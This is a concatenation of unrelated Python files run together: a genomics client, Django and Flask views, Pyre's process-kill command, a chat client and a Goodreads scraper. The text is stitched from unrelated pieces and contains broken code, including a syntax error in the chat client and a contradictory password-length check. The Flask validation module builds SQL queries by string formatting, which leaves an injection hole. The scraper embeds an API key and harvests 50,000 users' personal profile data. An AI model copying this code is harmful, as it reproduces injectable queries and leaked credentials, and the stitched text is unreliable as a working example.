trackName, trackMode, color, trackHeight=200): return(self.tv.addBedTrackFromDataFrame(tbl, trackName, trackMode, color, trackHeight)) def displayGraphFromFile(self, filename, modelNames): self.tv.displayGraphFromFile(filename, modelNames) def setStyle(self, filename): self.tv.setStyle(filename) def sessionInfo(self): msg = {'cmd': 'getSessionInfo', 'status': 'request', 'callback': '', 'payload': ""} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload); def listSharedData(self): msg = {'cmd': 'listSharedData', 'status': 'request', 'callback': '', 'payload': ""} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload); def createGeneModel(self, targetGene, solverNames, tbl_regRegions, tfMap, matrixName): payload = {'targetGene': targetGene, 'solverNames': solverNames, 'tblRegulatoryRegionsCacheKey': tbl_regRegions.key, # used to look up in cache 'tfMap': tfMap, 'matrixName': matrixName} msg = {'cmd': 'createGeneModel', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] tbl = self.dataFrameFrom3partList(tblAsList) tbl.key = payload["key"] return(tbl) def displayMultiModelGraph(self, targetGene, modelList): modelNames = list(modelList.keys()) for modelName in modelNames: print(' now reducing modelName %s' % modelName) tbl = modelList[modelName]['model'] modelList[modelName]['model'] = tbl.key tbl = modelList[modelName]['regions'] modelList[modelName]['regions'] = tbl.key payload = {"targetGene": targetGene, "models": modelList}; msg = {'cmd': 'buildMultiModelGraph', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) g_json = response["payload"] open("g.json", "w") f = open("g.json", "w") f.write(g_json) f.close() self.displayGraphFromFile("g.json", modelNames) print("after calling displayGraphFromFile"); #return(payload) def createTaggedDataFrame(self, rows, columns): payload = {'rows': rows, 'cols': columns} msg = {'cmd': 'createTaggedDataFrame', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] tblAsList = payload["tbl"] pTbl = self.dataFrameFrom3partList(tblAsList) pTbl.key = payload["key"] return(pTbl) def findTaggedDataFrameOnServer(self, tbl): payload = tbl.key msg = {'cmd': 'identifyTaggedDataFrame', 'status': 'request', 'callback': '', 'payload': payload} self.trenaServer.send_string(json.dumps(msg)) response = json.loads(self.trenaServer.recv_string()) payload = response["payload"] return(payload) def setWidgetHeight(self, newHeight): self.tv.setWidgetHeight(newHeight) Application/dice_hand.py1-10 """Dice hand imports.""" import dice class Dicehand(): """Dice hand class.""" def __init__(self): """Initialize class attributes.""" self.current_score = 0 self.dice_value = dice.Dice() def get_round_score(self): """Return the current score.""" return self.current_score def throw(self, die_1, die_2): """Generate a number and returns a number.""" die_1_throw = die_1.throw() die_2_throw = die_2.throw() if die_1_throw == 1 or die_2_throw == 1: self.current_score = 0 return die_1_throw, die_2_throw if die_1_throw != 1 and die_2_throw != 1: self.current_score += die_1_throw + die_2_throw return die_1_throw, die_2_throw darklab8/darklab_darkbot import functools from types import SimpleNamespace timedelta = SimpleNamespace(small=5, medium=10, big=20, super_big=40) def execute_in_storage(storage): """Move main code being executed from discord.commands to my own code sections, which can be much easily tested """ def decorator_repeat(func): @functools.wraps(func) async def wrapper_repeat(*args, **kwargs): # print('executing '+func.__name__) methods = func.__name__.split('_') category = methods[0] operation = methods[1] ctx = args[0] names = args[1:] await ctx.send(f'executing {methods} operation ' f'for objects {names}, {ctx.author.mention}') category_controller = getattr(storage, category) await getattr(category_controller, operation)(ctx.channel.id, names) return await func(*args, **kwargs) return wrapper_repeat return decorator_repeat # -*- coding: utf-8 -*- from qcloudsdkcore.request import Request class ContentTranscodeRequest(Request): def __init__(self): super(ContentTranscodeRequest, self).__init__( 'wenzhi', 'qcloudcliV1', 'ContentTranscode', 'wenzhi.api.qcloud.com') def get_tohtml(self): return self.get_params().get('tohtml') def set_tohtml(self, tohtml): self.add_param('tohtml', tohtml) def get_url(self): return self.get_params().get('url') def set_url(self, url): self.add_param('url', url) banner/views.py # Create your views here. from django.db.models.base import Model from rest_framework import generics from banner.models import Banner from banner.serializers import BannerSerializer class BannerList(generics.ListAPIView): queryset = Banner.objects.all() serializer_class = BannerSerializer class BannerSingle(generics.RetrieveAPIView): queryset = Banner.objects.all() serializer_class = BannerSerializer adrien1018/app0 from typing import Dict from . import analysis from .series import SeriesModel from ..analyses_settings import experiment_analyses, computer_analyses class AnalysisManager: @staticmethod def track(run_uuid: str, data: Dict[str, SeriesModel]): for ans in experiment_analyses: ans.get_or_create(run_uuid).track(data) @staticmethod def track_computer(computer_uuid: str, data: Dict[str, SeriesModel]): for ans in computer_analyses: ans.get_or_create(computer_uuid).track(data) @staticmethod def get_handlers(): return analysis.URLS @staticmethod def get_db_indexes(): return analysis.DB_INDEXES @staticmethod def get_db_models(): return analysis.DB_MODELS # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import logging import os import shutil import signal from pathlib import Path import psutil from ... import ( commands, configuration as configuration_module, find_directories, recently_used_configurations, ) from . import remote_logging, servers, server_connection LOG: logging.Logger = logging.getLogger(__name__) PYRE_FIRE = """ ', ,c: ', ;cc: ,:l; ';:lll: 'cllc' 'clllll: ;loooc' 'cllllllc' ;looool, :llllllll, :, 'looooool' ;lollllllo: ;ll; ;ooooooool, 'loooooloool; ,clll: cdoddoooooo; ;oooooooooool: ;loooll: cddddddddodo; cooooooooooooolloooooool; ;ddddddddddo; 'loooooooooooooooooooooooc' cdddddddddc 'ldddddooooooooooooooooooo, ,coodolc; cddddddddddoooooooooooooo; ' ,oddddddddddddddddodooooo; ,::::::::::::, :ddddddddddddddddddddddl' 'lddddddddddxd: :ddddddddddddddddddddd: ;odddddddddddl, ;oxdddddddddddddddddl' 'ldddddddddddo: ,:ldxddxddddddddddl' :ddddddddddddl' cdxxxxxxxdddddl' ,ldddddddddddo; ,oxxxxxxxxxdc :ddddddddddddc;' 'cdxxxxxxo; ,ldddddddddddxo; ;dxxxo: cdddddddddddddc 'lo: ;oddddddddddddo, 'cddddddddddddd: ;odddddddddddddl, :ddddddddddddddddd: ,ldddddddddddddddddddl, :odddddddddddddddddddddo: 'ldddddddddddddddddddddddddl' ;odddddddddddl, ,ldddddddddddo; 'cdddddddddddd: :ddddddddddddc' ;odddddddddddo, ,odddddddddddo; cddddddddddddc cddddddddddddc ;oxddxddxddddo; ;odxxxxddddxxo, ;:::::::::::;' ';:::::::::::; """ def _kill_processes_by_name(name: str) -> None: for process in psutil.process_iter(attrs=["name"]): if process.info["name"] != name: continue # Do not kill the `pyre kill` command itself. pid_to_kill = process.pid if pid_to_kill == os.getpgid(os.getpid()): continue try: LOG.info(f"Killing process {name} with pid {pid_to_kill}.") os.kill(pid_to_kill, signal.SIGKILL) except (ProcessLookupError, PermissionError) as exception: LOG.debug( f"Failed to kill process {name} with pid {pid_to_kill} " + f"due to exception {exception}" ) def _kill_binary_processes(configuration: configuration_module.Configuration) -> None: LOG.warning("Force-killing all running pyre servers.") LOG.warning( "Use `pyre servers stop` if you want to gracefully stop all running servers." ) binary = configuration.get_binary_respecting_override() if binary is not None: _kill_processes_by_name(binary) def _kill_client_processes(configuration: configuration_module.Configuration) -> None: _kill_processes_by_name(find_directories.CLIENT_NAME) # TODO (T85602687): Run `buck kill` once buck is supported by the server def _delete_server_files(configuration: configuration_module.Configuration) -> None: socket_root = server_connection.get_default_socket_root() LOG.info(f"Deleting socket files logs under {socket_root}") for socket_path in servers.get_pyre_socket_files(socket_root): try: socket_path.unlink() except FileNotFoundError: pass except OSError as error: LOG.warning(f"Failed to remove socket file at `{socket_path}`: {error}") log_directory = Path(configuration.log_directory) / "new_server" LOG.info(f"Deleting server logs under {log_directory}") try: shutil.rmtree(str(log_directory), ignore_errors=True) except OSError: pass # TODO(T92826668): Delete files under artifact root def _delete_caches(configuration: configuration_module.Configuration) -> None: dot_pyre_directory = configuration.dot_pyre_directory resource_cache_directory = dot_pyre_directory / "resource_cache" LOG.info( f"Deleting local binary and typeshed cache under {resource_cache_directory}" ) try: shutil.rmtree(str(resource_cache_directory), ignore_errors=True) recently_used_configurations.Cache(dot_pyre_directory).delete() except OSError: pass # TODO (T85602687): Try to remove buck builder cache as well once buck is # supported by the server @remote_logging.log_usage(command_name="kill") def run( configuration: configuration_module.Configuration, with_fire: bool ) -> commands.ExitCode: try: _kill_binary_processes(configuration) _kill_client_processes(configuration) # TODO (T85602550): Store a rage log before this happens. # TODO (T85614630): Delete client logs as well. _delete_server_files(configuration) _delete_caches(configuration) if with_fire: LOG.warning( ( "Note that `--with-fire` adds emphasis to `pyre kill` but does" + f" not affect its behavior.\n{PYRE_FIRE}" ) ) LOG.info("Done\n") return commands.ExitCode.SUCCESS except Exception as error: raise commands.ClientException( f"Exception occured during `pyre kill`: {error}" ) from error abdulnsheikh/pythonArtificial intelligence/Matplotlib/Tutorial #1/notes.py # # Tutorial #1 # Median Scientist Salary by Age s_x = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35] s_y = [39496, 43000, 47752, 50320, 54200, 57000, 63316, 65928, 68317, 69748, 74752] # Median Salaries Of a Computer Scientist by Age s_cs_x = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35] s_cs_y = [46372, 49876, 54850, 58287, 64016, 66998, 71003, 71000, 72496, 76370, 84640] #!/usr/bin/env python import sys import click import logging from pathlib import Path from typing import TextIO from typing import Union, Tuple from . import tree from haptools import data CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"]) @click.group(context_settings=CONTEXT_SETTINGS) @click.version_option() def main(): """ happler: A haplotype-based fine-mapping method Test for associations between a trait and haplotypes (ie sets of correlated SNPs) rather than individual SNPs """ pass @main.command(context_settings=CONTEXT_SETTINGS) @click.argument("genotypes", type=click.Path(exists=True, path_type=Path)) @click.argument("phenotypes", type=click.Path(exists=True, path_type=Path)) @click.option( "--region", type=str, default=None, show_default="all genotypes", help=""" The region from which to extract genotypes; ex: 'chr1:1234-34566' or 'chr7'\n For this to work, the VCF must be indexed and the seqname must match!""", ) @click.option( "-s", "--sample", "samples", type=str, multiple=True, show_default="all samples", help=( "A list of the samples to subset from the genotypes file (ex: '-s sample1 -s" " sample2')" ), ) @click.option( "-S", "--samples-file", type=click.File("r"), show_default="all samples", help=( "A single column txt file containing a list of the samples (one per line) to" " subset from the genotypes file" ), ) @click.option( "-o", "--output", type=click.File("w"), default="-", show_default="stdout", help="A .hap file describing the extracted haplotypes.", ) @click.option( "-v", "--verbosity", type=click.Choice(["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]), default="ERROR", show_default="only errors", help="The level of verbosity desired", ) def run( genotypes: Path, phenotypes: Path, region: str = None, samples: Tuple[str] = tuple(), samples_file: Path = None, output: TextIO = sys.stdout, verbosity: str = 'CRITICAL', ): """ Use the tool to find trait-associated haplotypes GENOTYPES must be formatted as VCFs and PHENOTYPES must be a tab-separated file containing two columns: sample ID and phenotype value Ex: happler run tests/data/simple.vcf tests/data/simple.tsv > simple.hap \f Parameters ---------- genotypes : Path The path to the genotypes in VCF format phenotypes : Path The path to the phenotypes in TSV format. There should be no header lines. region : str, optional See documentation for :py:meth:`~.data.Genotypes.read` sample : Tuple[str], optional See documentation for :py:meth:`~.data.Genotypes.read` samples_file : Path, optional A single column txt file containing a list of the samples (one per line) to subset from the genotypes file """ log = logging.getLogger("run") logging.basicConfig( format="[%(levelname)8s] %(message)s (%(filename)s:%(lineno)s)", level=verbosity, ) # handle samples if samples and samples_file: raise click.UsageError( "You may only use one of --sample or --samples-file but not both." ) if samples_file: with samples_file as samps_file: samples = samps_file.read().splitlines() elif samples: # needs to be converted from tuple to list samples = list(samples) else: samples = None # load data log.info("Loading genotypes") gt = data.Genotypes.load(genotypes, region=region, samples=samples) log.info("Loading phenotypes") ph = data.Phenotypes.load(phenotypes, samples=samples) log.info("Running tree builder") hap_tree = tree.TreeBuilder(gt, ph).run() log.info("Outputting haplotypes") tree.Haplotypes.from_tree(hap_tree).write(output) if __name__ == "__main__": # run the CLI if someone tries 'python -m happler' on the command line main(prog_name="happler") import re def test(): # Here we can either check objects created in the solution code, or the # string value of the solution, available as __solution__. A helper for # printing formatted messages is available as __msg__. See the testTemplate # in the meta.json for details. # If an assertion fails, the message will be displayed # Regex expression to capture the line plot variable name without whitespace capture_grp = re.search("[^\s]*(?=\s*=\s*alt.Chart\(stocks\).mark_line)", __solution__) assert capture_grp, "Make sure you assign the line plot to a variable name." # capture_grp.group() holds the variable name of line plot assert capture_grp.group() + ".mark_point" in __solution__, "Make sure you add a layer of another plot object, created from the line plot object with the same encodings but different mark type." # Making sure that the attributes for the line plot object provided in sample code remain unmodified. # Actual plot object is stored in globals() dict. line_plot_object = globals()[capture_grp.group()] # Following test added for a more graceful error message if line_plot_object is not of type Chart. assert type(line_plot_object) == type(alt.Chart()), "Something happened to your line plot. Check to make sure that it is a correct alt.Chart line plot or try renaming the line plot." assert line_plot_object.mark == 'line', f"Make sure you keep {capture_grp.group()} as a line plot using the correct mark type." assert line_plot_object.encoding.x.shorthand == 'date', "Make sure you keep 'date' as the x-axis encoding." assert line_plot_object.encoding.y.shorthand == 'price', "Make sure you keep 'price' as the y-axis encoding." assert line_plot_object.encoding.color.shorthand == 'symbol', "Make sure you keep 'symbol' as the color encoding." __msg__.good("You're correct, well done!") cmagnobarbosa/sara_public-10 """ Default Config File. """ # database to mongo DATABASE = 'mestrado' DEFAULT = 'resultados/' sara_files_path = f'{DEFAULT}sara_storage/' centrality_path = f'{DEFAULT}resultados_importancia/' network_path = f'{DEFAULT}redes/' cloud_path = f'{DEFAULT}cloud/' sarabottagger_path = f'{DEFAULT}sarabottagger/' quarentine_path = f'{DEFAULT}sarabot/quarantine/' tf_idf_path = f'{DEFAULT}tf_idf' """ Implement data validations """ import re from flask import jsonify, make_response,abort from validate_email import validate_email from app.api.v2 import database def format_response(status_code, msg, data=list()): """ Method to format responses in a json format :params: status_code, message, data :response: json object """ response = { "status":status_code, "message": msg, "data":data } return make_response(jsonify(response),status_code) def check_duplication(column, table, value): """ Method to check for a value duplication :params: table column, table and variable value Aborts if there is a duplication """ query = """ SELECT {} FROM {} WHERE LOWER({}) = LOWER('{}') """.format(column, table, column, value) duplicated = database.select_from_db(query) if duplicated: abort(make_response(jsonify({ "status":400, "error":"Record already exists in the database"}), 400)) def validate_credentials(self, data): """Validate email, password and role fields""" self.email = data["email"].strip() self.password = data["password"].strip() valid_email = validate_email(self.email) if not valid_email: Message = "Please supply a valid email" abort(400, Message) elif len(self.password) < 6 or len(self.password) > 6: Message = "Password must be long than 6 characters or less than 12" abort(400, Message) elif not any(char.isdigit() for char in self.password): Message = "Password must have a digit" abort(400, Message) elif not any(char.isupper() for char in self.password): Message = "Password must have an upper case character" abort(400, Message) elif not any(char.islower() for char in self.password): Message = "Password must have a lower case character" abort(400, Message) elif not re.search("^.*(?=.*[@#$%^&+=]).*$", self.password): Message = "Password must have a special charater" abort(400, Message) def sanitize_input(input_data): """ Method to sanitize data input :params: user_data Check if it is alphanumeric :response: True, False """ if input_data.isalpha() == False: return False def validate_ints(data): """ Method to validate data of type integer :params: data :response: True, False """ if not isinstance(data, int): return False return True def validate_string(data): """ Method to validate data of type string :params: user input :response: True, False """ if not isinstance(data, str): return False return True def check_field_is_not_empty(input_data): if input_data == "": return False def strip_whitespace(input_data): input_data = input_data.strip() return input_data def check_is_valid_url(url): """check if the url provided is valid""" if re.match(r"https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)", url): return True return False def validate_party_json_keys(request): """ Method to validate request keys :params: request :response: error array """ request_keys = ["name", "hqaddress", "logoUrl"] errors = [] for key in request_keys: if not key in request.json: errors.append(key) return errors def validate_office_json_keys(request): """ Method to validate request keys :params: request :response: error array """ request_keys = ["name","office_type"] errors = [] for key in request_keys: if not key in request.json: errors.append(key) return errors def validate_phone_number(phone_number): """ Method to validate phone number :params: phone number :response: boolean """ if len(phone_number) != 10: return False if not phone_number.isdigit(): return False return True def return_error(status_code, message): """ Method to format error message :params: status_code, error message :response: json object """ response = { "status":status_code, "error": message } return make_response(jsonify(response),status_code) def validate_alphabets(user_input): """ Method to validate that a string contains letters only :response:boolean :params: user data, string """ if not user_input.isalpha(): return False return True def validate_office_types(office_type): """ Method to validate office types :params: office type :response: boolean """ office_types = ["local","federal","state", "legistlative"] if office_type not in office_types: return False return True def validate_user_json_keys(request): request_keys = ["firstname", "lastname", "othername","email","phoneNumber","password","passportUrl"] errors = [] for key in request_keys: if not key in request.json: errors.append(key) return errors def check_if_admin_key(request): admin_key = ["isAdmin","isAdmin","isAdmin","isAdmin","isAdmin","isAdmin","isAdmin","isAdmin","isAdmin"] for key in admin_key: if not key in request.json: return False return True def validate_candidate_json_keys(request): """ Method to validate request keys :params: request :response: error array """ request_keys = ["office","party"] errors = [] for key in request_keys: if not key in request.json: errors.append(key) return errors def sanitize_data(data): errors=[] for item in data: if item == "": errors.append(item) return errors import sys sys.path.append('../../') import constants as cnst import pandas import os root_url = f'{cnst.amt_bucket_base_url}/textured_rendering/' image_dir = f'{cnst.output_root}sample/29/flame_param_association_eval/textured_rendering/' image_names = os.listdir(image_dir) for i, file_name in enumerate(image_names): image_names[i] = root_url + file_name df = pandas.DataFrame(data={"image_url": image_names}) csv_path = f'{cnst.output_root}sample/29/flame_param_association_eval/' df.to_csv(os.path.join(csv_path, "flm_asso_10k.csv"), sep=',', index=False)from django.shortcuts import get_object_or_404, render_to_response from django.shortcuts import render from registration.models import * from events.models import EventNew from django.contrib.auth.models import User from django.contrib.auth.decorators import login_required from django.template import Context from django.core.mail import send_mail, EmailMessage from django.contrib.auth import logout from django.contrib import auth from django.db.models import F # Create your views here. @login_required def index(request, pagename): u_list = UserProfile.objects.order_by('college')[0:] return render(request, 'pcradmin/'+pagename+'.html', {'u_list':u_list}) @login_required def change_team_limit_list(request): u_list = UserProfile.objects.order_by('college')[0:] return render(request, 'pcradmin/change_team_limit_list.html', {'u_list':u_list}) @login_required def change_team_limits(request): if request.method == 'POST': uid = request.POST.get('uid', False) #fna = request.POST['fna'] #lna = request.POST['lna'] e_list = EventNew.objects.order_by('name')[0:] message = "" return render(request, 'pcradmin/changelimit.html', {'uid':uid, 'e_list':e_list, 'message':message}) @login_required def change_limits(request): if request.method == 'POST': userid = request.POST['userid'] climit = request.POST['limit'] eventid = request.POST['eventid'] p = EventLimits() p.event = EventNew.objects.get(id=int(eventid)) p.leader = UserProfile.objects.get(id=int(userid)) p.limit = climit p.save() return render(request, 'pcradmin/limit_changed.html') @login_required def change_sports_limits(request): a_list = EventNew.objects.order_by('name')[0:] return render(request, 'pcradmin/changesportslimit.html', {'a_list':a_list}) @login_required def save_sports_limits(request): if request.method == 'POST': slimit = request.POST['limit'] eventid = request.POST['eventid'] p = EventNew.objects.get(id=int(eventid)) p.max_limit = slimit p.save() return render(request, 'pcradmin/sportslimitchanged.html') @login_required def index(request, pagename): user_list = User.objects.all() return render(request, 'pcradmin/'+pagename+'.html',{'users' : user_list}) @login_required def set_status(request): if request.method == 'POST': user_name = request.POST['username'] #test1= Participant.objects.filter( gleader__contains = "test") #k= test1.events.all() #p = test1.name #return render(request, 'pcradmin/setstatus.html',{'uname': user_name,'event' : k, 'xname': p }) return render(request, 'pcradmin/setstatus.html',{'uname': user_name}) @login_required def save_status(request): if request.method == 'POST': stat = request.POST['status'] user_name = request.POST['uname'] gauss= User.objects.all() tstat=2 if stat == '0': for obj in gauss: if obj.username == user_name: obj.is_active = False obj.save() if obj.is_active == False: tstat=0 if stat == '1': for obj in gauss: if obj.username == user_name: obj.is_active = True obj.save() if obj.is_active == True: tstat=1 return render(request, 'pcradmin/showstatus.html', {'tstat': tstat}) @login_required def send_mail(request): if request.method == 'POST': sub=request.POST['sub'] body= request.POST['body'] send_to= request.POST['mailadd'] email = EmailMessage(sub, body, '', [send_to]) email.send() return render(request, "pcradmin/sent.html") @login_required def compose(request): if request.method == 'POST': emailadd = request.POST['email'] return render(request, 'pcradmin/compose.html', {'emailadd' : emailadd}) # def pcr_login(request): # context = RequestContext(request) # if request.method == 'POST': # #return render(request, 'pcradmin/changelimit.html') # username = request.POST['username'] # password = request.POST['password'] # user = authenticate(username=username, password=password) # if user: # if user.is_active: # if user.is_staff: # login(request, user) # return HttpResponseRedirect('../dashboard/') # else: # context = {'error_heading' : "Access Denied", 'error_message' : 'You are not a PCr Member.
Return back home'} # return render(request, 'pcradmin/error.html', context) # else: # context = {'error_heading' : "Account Frozen", 'error_message' : 'No changes can be made now
Return back home'} # return render(request, 'pcradmin/error.html', context) # else: # context = {'error_heading' : "Invalid Login Credentials", 'error_message' : 'Please try again'} # return render(request, 'pcradmin/error.html', context) # else: # return render(request, 'pcradmin/login.html')swarm64/py-pg-data-gen import pytest from lib.executor import Executor from lib.table import Table @pytest.fixture def executor(mocker): mocker.patch('lib.schema_parser.Schema') class ExecutorFixture(Executor): def __init__(self): self.tables = { 'a': Table(schema_path='bla/a.sql', scaler=1), 'b': Table(schema_path='bleh/b.sql', scaler=10), 'c': Table(schema_path='bleh/c.sql', scaler=0.1) } self.graph = { 'a': ['c', 'b'], 'b': [], 'c': ['b'], } self.entrypoint = 'a' return ExecutorFixture() def test_generate_sequence(executor): sequence = executor._generate_sequence() assert sequence == ['a', 'c', 'b'] def test_sequence_no_deps(executor): executor.graph = { 'x': [], 'y': [], 'z': [] } executor.entrypoint = ['x', 'y', 'z'] sequence = executor._generate_sequence() assert sequence == ['x', 'y', 'z'] client/src/gochat/apiHelper.py import requests, json import variables, pymongo from pymongo import MongoClient from bson.json_util import dumps from requests.auth import HTTPBasicAuth client = MongoClient("mongodb://localhost:26969/") db = client['gochat'] user = db['user'] messages = db['messages'] user.ensure_index('username',unique=True) def checkUser(username): url = variables.AWSEndPoint + "/checkUser" data = {"username": username} json_data = json.dumps(data) headers = {'Content-type': 'application/json'} response = requests.post(url, data=json_data, headers=headers) return response.text def registerUser(username, password): url = variables.AWSEndPoint + "/registerUser" data = {"username": username, "password": (password)} json_data = json.dumps(data) headers = {'Content-type': 'application/json'} response = requests.post(url, data=json_data, headers=headers) if response.text != "exists": try: db.user.insert_one({'username':username, 'password': )}) except e: print e return response.text def deleteUser(): try: selfUser = db.user.find_one() selfUserName = selfUser['username'] selfPassword = selfUser['password'] requests.get(variables.AWSEndPoint + '/removeUser', auth=(selfUserName, selfPassword)) db.user.drop() return True except: return False def sendMessage(recipient, message): selfUser = db.user.find_one() selfUserName = selfUser['username'] selfPassword = selfUser['password'] if "true" in checkUser(recipient): url = variables.AWSEndPoint + "/newMessage" data = {"to": recipient, "message": message} json_data = json.dumps(data) headers = {'Content-type': 'application/json'} response = requests.post(url, auth=(selfUserName, selfPassword), data=json_data, headers=headers) return response.text else: return "No such user exists!" def unreadMessages(): selfUser = db.user.find_one() selfUserName = selfUser['username'] selfPassword = selfUser['password'] url = variables.AWSEndPoint + "/getNewMessages" response = requests.get(url, auth=(selfUserName, selfPassword)) data = json.loads(response.text) #db.messages.insert(data) return response.text def hash_pass(password): # used to hash the password similar to how MySQL hashes passwords with the password() function. import hashlib hash_password = hashlib.sha1(password.encode('utf-8')).digest() hash_password = hashlib.sha1(hash_password).hexdigest() hash_password = '*' + hash_password.upper() return hash_password def test(): response = [{"timestamp": 1481886764, "message": "hihhi", "from": "sha"}] print json.dumps(response) #!/usr/bin/env python3 # -*- coding: utf-8 -*- extensions = ['sphinx.ext.autodoc', 'jaraco.packaging.sphinx', 'rst.linker'] master_doc = "index" # Custom sidebar templates, maps document names to template names. html_theme = 'alabaster' templates_path = ['_templates'] html_sidebars = {'index': ['tidelift-sidebar.html']} link_files = { '../CHANGES.rst': dict( using=dict(GH='https://github.com'), replace=[ dict( pattern=r'(Issue #|\B#)(?P\d+)', url='{package_url}/issues/{issue}', ), dict( pattern=r'(?m:^((?Pv?\d+(\.\d+){1,2}))\n[-=]+\n)', with_scm='{text}\n{rev[timestamp]:%d %b %Y}\n', ), dict( pattern=r'PEP[- ](?P\d+)', url='https://www.python.org/dev/peps/pep-{pep_number:0>4}/', ), dict( pattern=r'Python #(?P\d+)', url='https://bugs.python.org/issue{python}', ), ], ) } import urllib2 import csv import time import sys import xml.etree.ElementTree as ET import os def getval(root, element): try: ret = root.find(element).text if ret is None: return "" else: return ret.encode("utf8") except: return "" with open('csv_files/user_data.csv', 'w') as csvfile, open('csv_files/book_data.csv', 'w') as csvfile_book, open('csv_files/book_author.csv', 'w') as csvfile_author: fieldnames = ['id', 'name','user_name', 'profile_url','image_url', 'about', 'age', 'gender', 'location','joined','last_active' ] writer = csv.DictWriter(csvfile, delimiter = ',', lineterminator = '\n', fieldnames=fieldnames) writer.writeheader() book_fieldnames = [ 'user_id', 'b_id', 'shelf', 'isbn', 'isbn13', 'text_reviews_count', 'title', 'image_url', 'link', 'num_pages', 'b_format', 'publisher', 'publication_day', 'publication_year', 'publication_month', 'average_rating', 'ratings_count', 'description', 'published' ] writer_book = csv.DictWriter(csvfile_book, delimiter = ',', lineterminator = '\n', fieldnames=book_fieldnames) writer_book.writeheader() author_fieldnames = [ 'u_id', 'b_id', 'a_id', 'name', 'average_rating', 'ratings_count', 'text_reviews_count'] writer_author = csv.DictWriter(csvfile_author, delimiter = ',', lineterminator = '\n', fieldnames = author_fieldnames) writer_author.writeheader() for i in range(1,50000): try: time.sleep(1) url = 'https://www.goodreads.com/user/show/'+ str(i) +'.xml?key=' response = urllib2.urlopen(url) user_data_xml = response.read() # write xml to file f = open("xml_docs/user"+ str(i) +".xml", "w") try: f.write(user_data_xml) finally: f.close() #root = ET.fromstring() root = ET.parse("xml_docs/user"+ str(i) +".xml").getroot() os.remove("xml_docs/user"+ str(i) +".xml") user_element = root.find('user') id = getval(user_element,'id') name = getval(user_element,'name') user_name = getval(user_element,'user_name') profile_url = getval(user_element,'link') image_url = getval(user_element,'image_url') about = getval(user_element,'about') age = getval(user_element,'age') gender = getval(user_element,'gender') location = getval(user_element,'location') joined = getval(user_element,'joined') last_active = getval(user_element,'last_active') writer.writerow({'id': id, 'name' : name,'user_name' : user_name, 'profile_url' : profile_url,'image_url' : image_url, 'about' : about, 'age': age, 'gender' : gender, 'location' : location, 'joined' : joined, 'last_active': last_active}) # get list of user shelves user_shelves_root = user_element.find('user_shelves') user_shelf_list = [] for user_shelf in user_shelves_root.findall("user_shelf"): shelf = getval(user_shelf,"name") #Books on Shelf shelf_url = "https://www.goodreads.com/review/list/"+ str(i) +".xml?key=i3Zsl7r13oHEQCjv1vXw&v=2&shelf=" + shelf time.sleep(1) response = urllib2.urlopen(shelf_url) shelf_data_xml = response.read() # write xml to file f = open("xml_docs/user_shelf_" + shelf + "_"+ str(i) + ".xml", "w") try: f.write(shelf_data_xml) finally: f.close() shelf_root = ET.parse("xml_docs/user_shelf_" + shelf + "_"+ str(i) + ".xml").getroot() os.remove("xml_docs/user_shelf_" + shelf + "_"+ str(i) + ".xml") reviews = shelf_root.find("reviews") for review in reviews.findall("review"): for book in review.findall("book"): b_id = getval(book,"id") isbn = getval(book,"isbn") isbn13 = getval(book,"isbn13") text_reviews_count = getval(book,"text_reviews_count") title = getval(book,"title") image_url = getval(book,"image_url") link = getval(book,"link") num_pages = getval(book,"num_pages") b_format = getval(book,"format") publisher = getval(book,"publisher") publication_day = getval(book,"publication_day") publication_year = getval(book, "publication_year") publication_month = getval(book,"publication_month") average_rating = getval(book,"average_rating") ratings_count = getval(book,"rating_count") description = getval(book,"description") published = getval(book,"published") writer_book.writerow({ 'user_id': id, 'b_id' : b_id , 'shelf' : shelf, 'isbn' : isbn, 'isbn13': isbn13, 'text_reviews_count' : text_reviews_count, 'title' : title, 'image_url' : image_url, 'link' : link, 'num_pages' : num_pages, 'b_format' : b_format, 'publisher' : publisher, 'publication_day' : publication_day, 'publication_year' : publication_year, 'publication_month' : publication_month, 'average_rating' : average_rating, 'ratings_count' : ratings_count, 'description' : description }) authors = book.find("authors") for author in authors.findall("author"): a_id = getval(author,"id") name = getval(author,"name") average_rating = getval(author,"average_rating") ratings_count = getval(author,"ratings_count") text_reviews_count = getval(author,"text_reviews_count") writer_author.writerow({'u_id': id, 'b_id' : b_id, 'a_id' : a_id, 'name' : name, 'average_rating' : average_rating, 'ratings_count' : ratings_count, 'text_reviews_count' : text_reviews_count}) except: time.sleep(1)from typing import Optional def ensure_sim_type_string(value: Optional[str]) -> Optional[str]: if value is None or len(value) == 0 or value[0].isupper(): return value return value[0].upper() + value[1:] import numpy from PIL import Image, ImageDraw import cv2 polygon = [(1,1),(100,20),(120, 130), (12, 120)] width = 299 height = 299 img = Image.new('L', (width, height), 0) ImageDraw.Draw(img).polygon(polygon, outline=1, fill=1) mask = numpy.array(img) print(mask) cv2.imshow("mask", mask * 255) cv2.waitKey(0) import requests import sys import time import os _MAX_SECONDS_ALLOWED_FOR_TESTS = 900 def main(): trigger_url = sys.argv[1] trigger_resp = requests.get(trigger_url) if trigger_resp.ok: trigger_json = trigger_resp.json().get("data", {}) test_runs = trigger_json.get("runs", []) print("Started {} test runs.".format(len(test_runs))) results = {} deadline = time.time() + _MAX_SECONDS_ALLOWED_FOR_TESTS while len(results) < len(test_runs): if time.time() >= deadline: print('Some test runs did not complete in the allowed window of %s seconds' % _MAX_SECONDS_ALLOWED_FOR_TESTS) exit(1) time.sleep(1) for run in test_runs: test_run_id = run.get("test_run_id") if test_run_id not in results: result_data = _get_result(run) if 